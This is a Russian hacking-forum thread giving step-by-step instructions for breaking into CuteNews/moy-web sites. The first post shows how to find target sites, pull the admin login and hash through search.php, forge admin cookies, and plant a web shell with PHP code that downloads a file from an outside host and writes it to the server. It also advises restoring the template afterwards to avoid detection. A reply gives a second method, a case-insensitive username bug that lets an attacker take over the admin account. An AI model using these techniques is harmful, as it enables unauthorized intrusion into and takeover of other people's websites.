[Взлом] Ещё один (но упрощеный) мануал по взлому CuteNews

Тема в разделе "Статьи и Co", создана пользователем Netprostor, 26 ноя 2008.

Статус темы:
Закрыта.
  1. Netprostor

    Netprostor Писатель

    Регистр.:
    29 окт 2008
    Сообщения:
    9
    Симпатии:
    5
    Мануал по взлому CuteNews, в частности сайтов на движке moy-web.

    Взлом moy-web уже такая заезженная тема, но этот сайт всподвиг меня на написание ещё одного мануала.
    Сайты на moy-web'е постоянно появляются новые, найти их очень просто: Яндекс Гугл

    Скачиваем:
    Firefox
    Плагин Cookies Editor для Firefox


    1. Находим сайт на движке moy-web. Удобно искать запросами, которые я написал выше.
    2. После того, как нашли сайт, ищем файл search.php по адресу .../news/search.php
    3. Если файл там есть, значит приступаем к следующему действию, если файла нет, переходим к пункту 1.
    4. Теперь нам надо узнать логин админа, для этого переходим сюда и вводим полный путь к search.php
    5. Получили логин админа и теперь узнаем хэш админа, для этого переходим сюда и вводим Логин (у меня root) и путь к файлу search.php
    6. Получаем хэш админа. (у меня ec361eff84f3ef4d75214585da176f5e)

    Устанавливаем Firefox и плагин для него.
    Дальше идем Инструменты=>Редактор Cookies=>Добавить
    Заполняем:
    1. Имя=>username
    2. Содержимое=>Логин администратора (у меня root)
    3. Узел=> путь к сайту (БЕЗ HTTP:// напр. www.сайт.ру)
    4. Путь=>Путь к админке (у меня /news/)
    Жмем сохранить.. Сохранили и добавляем еще 1 кук. Жмем добавить:
    1. Имя=>md5_password
    2. Содержимое=>Хэш (у меня ec361eff84f3ef4d75214585da176f5e)
    3. Узел=> путь к сайту (БЕЗ HTTP://, напр. www.сайт.ру)
    4. Путь=>Путь к админке (у меня /news/)
    Сохраняем… Теперь идем в админку… Воаля, вы залогинены)))

    Не спешите добавить похабную новость, давайте зальем туда шелл, что бы узнать пароли от mysql и вообще управлять содержимым сайта.

    Заливаем шелл:
    Настройкa блока новостей=>Редактировать шаблоны=>Активные новости
    Удаляем от туда всё и вставляем следующее:

    Код:
    HTML;
    $file = file_get_contents('http://shellss.by.ru/file.txt');
    $brd = fopen('file.php','w+');
    $write = fwrite($brd, $file);
    Сохранить…

    Через пару минут наш файл загрузится.
    Заходим .../news/file.php вводим логин-1 пароль-1
    Потом не забудьте изменить шаблон активных новостей "как было", что бы не спалиться.

    Вот пару готовых примеров, сильно их не пугайте тока)))

    сайт \ шелл
    сайт \ шелл

    Логин и пароль - 1
     
    deadked, semakos, lift и ещё 1-му нравится это.
  2. Netprostor

    Netprostor Писатель

    Регистр.:
    29 окт 2008
    Сообщения:
    9
    Симпатии:
    5
    Забыл упомянуть, что можно хэш найти напр. тут, но их база содержит не все хэши, универсальным же способом остается запись куков.
     
    lift нравится это.
  3. deadked

    deadked Писатель

    Регистр.:
    22 авг 2009
    Сообщения:
    3
    Симпатии:
    0
    Не актуально, но всё-же. Что делать если нет файлика search.php а нужно ломануть определённый сайт?
     
  4. oxxxy

    oxxxy Постоялец

    Регистр.:
    30 авг 2009
    Сообщения:
    66
    Симпатии:
    5
    Все гораздо проще, бага работает вплоть до последней версии:
    Нужно: аккаунт с правами journalist или аккаунт с правами на сохранение настроек, знать логин админа (обычно пишется при добавление новости, но учтите иногда может писать не логин, а ник, если он указан, и он может отличаться от логина).

    Смотрим файл inc/options.mdu и видим в нём код:
    Код:
    foreach($old_user_db as $old_user_db_line){
                    $old_user_db_arr = explode("|", $old_user_db_line);
                    if(strtolower($username) != strtolower($old_user_db_arr[2])){
                            fwrite($new_user_db,"$old_user_db_line");
                    }
                    else{
                         if($editpassword != ""){
                         $old_user_db_arr[3] = md5($editpassword);
                         if($config_use_cookies == TRUE){ setcookie("md5_password", $old_user_db_arr[3]); }
                            $_SESSION['md5_password'] = $old_user_db_arr[3];
                         }
                         fwrite($new_user_db,"$old_user_db_arr[0]|$old_user_db_arr[1]|$old_user_db_arr[2]|$old_user_db_arr[3]|$editnickname|$editmail|$old_user_db_arr[6]|$edithidemail|$change_avatar|$old_user_db_arr[9]||\n");
                         $personal_success = TRUE;
                    }
            }  
    Суть в следующем - пусть на сайте есть админ с логином admin регистрируем пользователя ADMin (он сохраняется именно в таком виде), заходим под ним (с учётом регистра) - и... мы не более чем обычные пользователи, при проверке логина и пароля всё норм, но теперь идем в личные настройки и меняем пароль (не важно на какой). Из-за того что в коде стоит strtolower($username) != strtolower($old_user_db_arr[2]), то пароль поменяется для всех с ником admin не зависимо от регистра.
    Разлогиниваемся и логинимся, только теперь логин пишем не ADMin, а admin и тот новый пароль, который поставили при смене и получаем права админа.

    Внимание: учитывайте, что после всех этих действий админ не сможет зайти под своим аккаунтом - пароль, почта и т.д. - всё это поменяется. Единственное что можно сделать - это заранее запомнить почтовый адрес и уже с шелла, удалив нового админа (а палиться ни к чему), поставить старую почту настоящему админу.
    Можно и не менять пароль админу, а изменить только почтовый ящик, для этого при редактирование данных пишем нужный нам email, далее разлогиниваемся и делаем восстановление пароля на email.

    В результате чего на почту придёт линк подтверждения смены пароля, по нему не переходим, а берём из него хеш админа.

    За информацию спасибо Grey
     
Статус темы:
Закрыта.